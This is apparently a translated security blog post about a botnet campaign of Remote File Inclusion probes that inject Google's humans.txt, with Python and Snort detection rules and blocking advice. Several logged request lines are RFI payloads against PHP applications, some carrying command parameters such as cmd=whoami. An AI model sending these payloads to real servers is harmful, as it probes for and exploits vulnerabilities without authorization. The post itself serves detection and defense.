Increase in RFI attacks using Google

(Please note this post was originally published on 10th January in the Spanish version of SAW; we found it relevant but couldn't find the time to translate it until now ;)

Lately we have been detecting a significant increase in Remote File Inclusion [1] attacks in which the same pattern is repeated in the attack payload: the injected URL is always the same, http://www.google.com/humans.txt. Although the content of this file is not malicious, the number and frequency of the alerts detected show that a reconnaissance attack campaign is underway.

The attacking IP addresses are spread worldwide (up to 10 countries have been detected, including Spain), which may indicate that one or more botnets are behind the attack. On average, over a period of 10 days, each of these IPs attacked about 12 targets, generating between 2,000 and 5,000 alerts each.

As an example, some of the requests detected are the following:

GET /zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=http://www.google.com/humans.txt? 
GET /123flashchat.php?e107path=http://www.google.com/humans.txt? HTTP/1.0
GET /22_ultimate/templates/header.php?mainpath=http://www.google.com/humans.txt?
GET /A-Blog/navigation/donation.php?navigation_start=http://www.google.com/humans.txt?
GET /OpenSiteAdmin/scripts/classes/FieldManager.php?path=http://www.google.com/humans.txt?%00
GET /index.php?dir=http://www.google.com/humans.txt?
GET /pollvote.php?pollname=http://www.google.com/humans.txt?&cmd=ls
GET /rss.php?page[path]=http://www.google.com/humans.txt?&cmd=ls
GET /phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.google.com/humans.txt?
GET /arab3upload/customize.php?path=http://www.google.com/humans.txt?&cmd=pwd
GET /ListRecords.php?lib_dir=http://www.google.com/humans.txt?&cmd=id
GET /ea-gBook/index_inc.php?inc_ordner=http://www.google.com/humans.txt?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
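Requests like the ones above can be picked out of web server access logs with a simple pattern match. The following is a minimal sketch (the helper name, regex, and sample lines are illustrative, not from a real log):

```python
import re

# Flags log lines whose query string injects Google's humans.txt file.
# Accepts both the .com and .es hostnames seen in this campaign.
PROBE = re.compile(r"=https?://www\.google\.(com|es)/humans\.txt", re.I)

def find_probes(log_lines):
    """Return the log lines that carry the humans.txt RFI probe."""
    return [line for line in log_lines if PROBE.search(line)]

sample = [
    "GET /index.php?dir=http://www.google.com/humans.txt?",
    "GET /index.php?page=about",
    "GET /rss.php?page[path]=http://www.google.com/humans.txt?&cmd=ls",
]
print(len(find_probes(sample)))  # 2 suspicious requests out of 3
```

Running a script like this over historical logs gives a quick first indication of whether your site was probed during the campaign.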

As we can see, it appears they are automatically looking for vulnerable resources. To test for these vulnerabilities they try to inject Google's (harmless) humans.txt file, which contains the following paragraph:

“Google is built by a large team of engineers, designers, researchers, robots, and others in many different sites across the globe. It is updated continuously, and built with more tools and technologies than we can shake a stick at. If you’d like to help us out, see google.com/jobs.”

If the attack is successful, the attacked page ends up containing that text. The automated tool used appears to be Skipfish, which tests for an RFI injection point by sending the string www.google.com/humans.txt or www.google.com/humans.txt%00 to the site's web pages.
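Since a successful injection makes the vulnerable page echo the humans.txt text, one hedged way to verify your own pages is to scan their output for a marker phrase from that file. A minimal sketch (the marker is quoted from humans.txt; the function name is ours):

```python
# Assumption: a successful RFI injection of humans.txt makes the page
# body contain the file's text. We check for a distinctive phrase.
MARKER = "than we can shake a stick at"

def looks_injected(page_body: str) -> bool:
    """Heuristic: does this page body echo Google's humans.txt?"""
    return MARKER in page_body

print(looks_injected("<html>...than we can shake a stick at...</html>"))  # True
print(looks_injected("<html>normal page</html>"))                          # False
```

This is only a heuristic; a page legitimately quoting humans.txt would also match, so treat hits as leads to investigate rather than confirmed compromises.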

It is clear that cybercriminals are increasingly using automated tools to perform web attacks [2], generating a significant amount of malicious traffic. It is therefore necessary to know and study new trends in automated attacks in order to keep improving sensor rules. Automated tools usually perform reconnaissance attacks looking for vulnerable applications or resources that will be attacked more aggressively later. Detecting a reconnaissance attack early helps identify attack vectors against other applications and allows blacklisting IP addresses before the real attack starts.

In the case of the Snort IDS, the following Emerging Threats signature alerts us to an attack of this type:

#alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB_SERVER PHP Generic 
Remote File Include Attempt (HTTP)"; flow:to_server,established; content:".php"; nocase; 
http_uri; content:"=http|3a|/"; nocase; http_uri; 
pcre:"/\x2Ephp\x3F.{0,300}\x3Dhttp\x3A\x2F[^\x3F\x26]+\x3F/Ui";
reference:url,doc.emergingthreats.net/2009151; classtype:web-application-attack; 
sid:2009151; rev:7;)
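The rule's PCRE can be read as: a ".php?" in the URI, followed within 300 characters by "=http:/" and a value that ends in a "?". As a quick sanity check, here is that regex transcribed into Python and run against one of the sample requests above (the transcription is ours; Snort's /U modifier applies the match to the normalized URI buffer and has no Python equivalent):

```python
import re

# The PCRE from the Emerging Threats rule, with hex escapes expanded
# (\x2E = '.', \x3F = '?', \x3D = '=', \x3A = ':', \x2F = '/'; /i = IGNORECASE).
RFI_PCRE = re.compile(r"\.php\?.{0,300}=http:/[^?&]+\?", re.I)

uri = "/pollvote.php?pollname=http://www.google.com/humans.txt?&cmd=ls"
print(bool(RFI_PCRE.search(uri)))           # True: the probe matches
print(bool(RFI_PCRE.search("/a.php?x=1")))  # False: ordinary query string
```

Note that the rule matches generic RFI attempts ("=http:/…?"), not this campaign specifically, so it will also fire on other RFI scans.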

To know if we are victims of this attack, we must check whether our server connects to Google to fetch that file. Furthermore, since the attack targets specific web application modules, we recommend verifying that all modules are up to date and uninstalling any that are not strictly necessary. To block this particular attack, we recommend adding a rule to the IPS or WAF (if available) that blocks any request whose URI includes the string “www.google.com/humans.txt”.
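For servers without an IPS or WAF in front of them, the same blocking rule can be approximated at the application layer. A minimal WSGI middleware sketch (the class name and response text are illustrative, not from any specific product):

```python
# Rejects any request whose path or query string contains the probe string,
# mirroring the recommended IPS/WAF rule at the application layer.
BLOCKED = "www.google.com/humans.txt"

class BlockHumansTxt:
    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        target = environ.get("PATH_INFO", "") + "?" + environ.get("QUERY_STRING", "")
        if BLOCKED in target:
            start_response("403 Forbidden", [("Content-Type", "text/plain")])
            return [b"Forbidden\n"]
        return self.app(environ, start_response)
```

Wrapping the WSGI application (`app = BlockHumansTxt(app)`) makes every matching request return 403 before it reaches vulnerable module code; a network-level rule is still preferable since it stops the traffic earlier.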

Another option is to try to block Skipfish via its User-Agent, which for version 2.10b is “Mozilla/5.0 SF/2.10b”, although this field can be easily changed and may therefore give a false sense of security.
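A filter on that header is a one-line check. A sketch (the function name is ours; as noted above, the header is trivially spoofed, so treat this as a weak supplementary filter only):

```python
# Default User-Agent sent by Skipfish 2.10b, as quoted in the text.
SKIPFISH_UA = "Mozilla/5.0 SF/2.10b"

def is_skipfish(user_agent: str) -> bool:
    """Weak heuristic: matches only the unmodified default header."""
    return user_agent.strip() == SKIPFISH_UA

print(is_skipfish("Mozilla/5.0 SF/2.10b"))              # True
print(is_skipfish("Mozilla/5.0 (X11; Linux x86_64)"))   # False
```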

According to its documentation, Skipfish can perform more than 500 requests per second against responsive Internet targets and over 2,000 requests per second on LAN/MAN networks. You may want to block traffic with these characteristics.
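Such request rates are far above what a human visitor generates, so a per-IP sliding-window counter can flag them. A sketch (the threshold and window are illustrative; real deployments belong in the firewall or load balancer, not application code):

```python
from collections import defaultdict, deque

# Illustrative limits: 100 requests per IP per second, well below the
# 500+ req/s Skipfish can generate against responsive targets.
WINDOW_SECONDS = 1.0
MAX_REQUESTS = 100

class RateTracker:
    def __init__(self):
        self.hits = defaultdict(deque)  # ip -> timestamps in the window

    def allow(self, ip: str, now: float) -> bool:
        """Record a request; return False once the IP exceeds the limit."""
        q = self.hits[ip]
        while q and now - q[0] > WINDOW_SECONDS:
            q.popleft()  # drop timestamps that fell out of the window
        q.append(now)
        return len(q) <= MAX_REQUESTS

tracker = RateTracker()
# A burst of 150 requests in the same second: the tail gets flagged.
verdicts = [tracker.allow("203.0.113.5", 0.5) for _ in range(150)]
print(verdicts.count(False))  # 50 requests over the limit
```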

It appears that this campaign is fairly widespread. The Akamai CSIRT recently warned about it, coinciding with our evidence, although they say the targets are financial sites. In our case the attack had no specific target.

[1] An RFI attack allows an attacker to inject a remote file, usually through a script on a web server. It can lead to data theft or manipulation, execution of malicious code on the web server, or execution of malicious code on the client side (such as JavaScript), which can lead to further attacks. The attack exploits a vulnerability caused by poor validation of user input.

[2] According to a July 2012 Imperva study, more than half of the malicious web attacks detected in traffic for the most common attack types (RFI, LFI, SQL Injection, Comment Spam, XSS and Directory Traversal) came from automated tools.